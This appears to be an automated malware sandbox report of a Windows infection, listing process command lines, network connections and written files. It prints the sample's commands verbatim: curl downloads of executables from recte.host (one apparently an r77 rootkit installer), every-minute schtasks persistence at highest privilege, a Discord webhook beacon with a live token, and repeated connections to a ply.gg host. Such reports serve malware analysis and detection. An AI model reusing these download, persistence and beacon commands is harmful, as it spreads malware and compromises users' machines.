curl https://recte.host/venom/calc.exe --output C:\Users\Admin\calc.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "yar" /tr "C:\Users\Admin\AppData\Roaming\yar.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "penisware" /tr "C:\Users\Admin\AppData\Local\penisware.exe"

C:\Users\Admin\calc.exe

"C:\Users\Admin\calc.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl https://recte.host/r77/Install.exe --output C:\Users\Admin\install.exe

C:\Windows\SysWOW64\curl.exe

curl https://recte.host/r77/Install.exe --output C:\Users\Admin\install.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\System32\mousocoreworker.exe

C:\Windows\System32\mousocoreworker.exe -Embedding

C:\Users\Admin\install.exe

"C:\Users\Admin\install.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1239677728240832532/RFIoqPa0RsA3ISZRB7mropzgu-w8H3HuWhnGN1Nqe_5NlnvP2SuBf7hFvNWch7r5TDhv" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""@everyone`yar.exe, sachost.exe, penisware.exe, penisballs.exe, physics.exe, calc.exe, and install.exe` Were Just Run On `Admin`'s PC"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"

C:\Windows\SysWOW64\curl.exe

curl "https://discord.com/api/webhooks/1239677728240832532/RFIoqPa0RsA3ISZRB7mropzgu-w8H3HuWhnGN1Nqe_5NlnvP2SuBf7hFvNWch7r5TDhv" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""@everyone`yar.exe, sachost.exe, penisware.exe, penisballs.exe, physics.exe, calc.exe, and install.exe` Were Just Run On `Admin`'s PC"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE


C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svvhost" /tr "C:\Users\Admin\AppData\Roaming\svvhost.exe"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{7dd393c1-6aab-4696-9d80-7741ae4f0c47}

C:\Users\Admin\yar.exe

"C:\Users\Admin\yar.exe"

C:\Users\Admin\sachost.exe

"C:\Users\Admin\sachost.exe"

C:\Users\Admin\penisware.exe

"C:\Users\Admin\penisware.exe"

C:\Users\Admin\penisballs.exe

"C:\Users\Admin\penisballs.exe"

C:\Users\Admin\physics.exe

"C:\Users\Admin\physics.exe"

C:\Users\Admin\calc.exe

"C:\Users\Admin\calc.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "yar" /tr "C:\Windows\system32\config\systemprofile\AppData\Roaming\yar.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "penisware" /tr "C:\Windows\system32\config\systemprofile\AppData\Local\penisware.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svvhost" /tr "C:\Windows\system32\config\systemprofile\AppData\Roaming\svvhost.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1032 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:8

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 456 -p 3296 -ip 3296

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3296 -s 508

C:\Users\Admin\AppData\Roaming\yar.exe

C:\Users\Admin\AppData\Roaming\yar.exe

C:\Users\Admin\AppData\Local\penisware.exe

C:\Users\Admin\AppData\Local\penisware.exe

C:\Users\Admin\AppData\Roaming\svvhost.exe

C:\Users\Admin\AppData\Roaming\svvhost.exe

C:\Users\Admin\AppData\Roaming\yar.exe

C:\Users\Admin\AppData\Roaming\yar.exe

C:\Users\Admin\AppData\Local\penisware.exe

C:\Users\Admin\AppData\Local\penisware.exe

C:\Users\Admin\AppData\Roaming\svvhost.exe

C:\Users\Admin\AppData\Roaming\svvhost.exe

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5212.0.1571581372\1476419891" -parentBuildID 20221007134813 -prefsHandle 1864 -prefMapHandle 1856 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e0e81da7-9ca2-4d71-887d-a5ef14a84881} 5212 "\\.\pipe\gecko-crash-server-pipe.5212" 1944 27d776d7b58 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5212.1.1518298457\657006121" -parentBuildID 20221007134813 -prefsHandle 2312 -prefMapHandle 2308 -prefsLen 20785 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f55e3891-880c-419a-b64f-b2885ad826a3} 5212 "\\.\pipe\gecko-crash-server-pipe.5212" 2344 27d77245c58 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5212.2.2022740486\1688792288" -childID 1 -isForBrowser -prefsHandle 3012 -prefMapHandle 3200 -prefsLen 20888 -prefMapSize 233444 -jsInitHandle 1160 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb9ad5ef-b656-47b3-b4d9-af5b5ef6c8e6} 5212 "\\.\pipe\gecko-crash-server-pipe.5212" 3232 27d7765c358 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5212.3.216660227\1109609678" -childID 2 -isForBrowser -prefsHandle 3492 -prefMapHandle 3512 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1160 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e00775e1-32a4-4d35-9da0-d1754d72708d} 5212 "\\.\pipe\gecko-crash-server-pipe.5212" 3532 27d79cf3058 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5212.4.1359970116\1643841891" -childID 3 -isForBrowser -prefsHandle 3760 -prefMapHandle 3704 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1160 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d9859021-b126-49fb-beeb-7ee6f7ce0270} 5212 "\\.\pipe\gecko-crash-server-pipe.5212" 3772 27d79b7d258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5212.5.2100969568\646837057" -childID 4 -isForBrowser -prefsHandle 4936 -prefMapHandle 4952 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1160 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9342e130-22af-4a3a-bed5-febb351a7134} 5212 "\\.\pipe\gecko-crash-server-pipe.5212" 4932 27d63b6ab58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5212.6.1878075749\761246163" -childID 5 -isForBrowser -prefsHandle 4960 -prefMapHandle 4956 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1160 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {10aa32d8-ed96-4486-bb96-3497cbc43854} 5212 "\\.\pipe\gecko-crash-server-pipe.5212" 2808 27d7d925558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5212.7.794327305\550752595" -childID 6 -isForBrowser -prefsHandle 5204 -prefMapHandle 5208 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1160 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d7499bac-cd39-45d3-b2c8-8affa8bd7530} 5212 "\\.\pipe\gecko-crash-server-pipe.5212" 5292 27d7d926158 tab

C:\Users\Admin\AppData\Roaming\yar.exe

C:\Users\Admin\AppData\Roaming\yar.exe

C:\Users\Admin\AppData\Local\penisware.exe

C:\Users\Admin\AppData\Local\penisware.exe

C:\Users\Admin\AppData\Roaming\svvhost.exe

C:\Users\Admin\AppData\Roaming\svvhost.exe

C:\Users\Admin\AppData\Roaming\yar.exe

C:\Users\Admin\AppData\Roaming\yar.exe

C:\Users\Admin\AppData\Local\penisware.exe

C:\Users\Admin\AppData\Local\penisware.exe

C:\Users\Admin\AppData\Roaming\svvhost.exe

C:\Users\Admin\AppData\Roaming\svvhost.exe

Network

US 147.185.221.19:47430 san-periods.gl.at.ply.gg tcp
US 8.8.8.8:53 73.239.69.13.in-addr.arpa udp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:45994 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:45994 san-periods.gl.at.ply.gg tcp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 172.217.169.42:443 chromewebstore.googleapis.com tcp
US 147.185.221.19:47430 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:47430 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:45994 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:47430 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:45994 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:47430 san-periods.gl.at.ply.gg tcp
US 8.8.8.8:53 aus5.mozilla.org udp
US 35.244.181.201:443 aus5.mozilla.org tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 201.181.244.35.in-addr.arpa udp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
US 34.160.144.191:443 prod.content-signature-chains.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 ciscobinary.openh264.org udp
FR 23.200.87.12:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 12.87.200.23.in-addr.arpa udp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.187.206:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
GB 142.250.187.206:443 redirector.gvt1.com udp
US 8.8.8.8:53 r4---sn-aigl6ney.gvt1.com udp
US 8.8.8.8:53 r4.sn-aigl6ney.gvt1.com udp
GB 173.194.183.169:443 r4.sn-aigl6ney.gvt1.com tcp
US 8.8.8.8:53 r4.sn-aigl6ney.gvt1.com udp
GB 173.194.183.169:443 r4.sn-aigl6ney.gvt1.com udp
US 8.8.8.8:53 169.183.194.173.in-addr.arpa udp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:45994 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:47430 san-periods.gl.at.ply.gg tcp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 147.185.221.19:45994 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:47430 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:45994 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:47430 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:45994 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:47430 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:45994 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:47430 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:45994 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:47430 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:45994 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:45994 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:47430 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:47430 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:38630 san-periods.gl.at.ply.gg tcp
US 147.185.221.19:25944 san-periods.gl.at.ply.gg tcp

Files

C:\Users\Admin\yar.exe

C:\Users\Admin\sachost.exe

C:\Users\Admin\penisware.exe

C:\Users\Admin\penisballs.exe

C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

C:\Users\Admin\physics.exe

C:\Users\Admin\calc.exe

C:\Users\Admin\install.exe

C:\Windows\Temp\__PSScriptPolicyTest_f3o103k1.q4v.ps1

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC7DF.tmp.csv

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC83E.tmp.txt

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\yar.exe.log

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\db\data.safe.bin

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\pending_pings\379b990b-3dbf-4355-9398-f611ca4d9dbb

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs-1.js

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

C:\Users\Admin\AppData\Local\Temp\tmpaddon

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\entries\F4EFE37A30D0F14C6AC03FF7949A51CBC2EBC649

C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State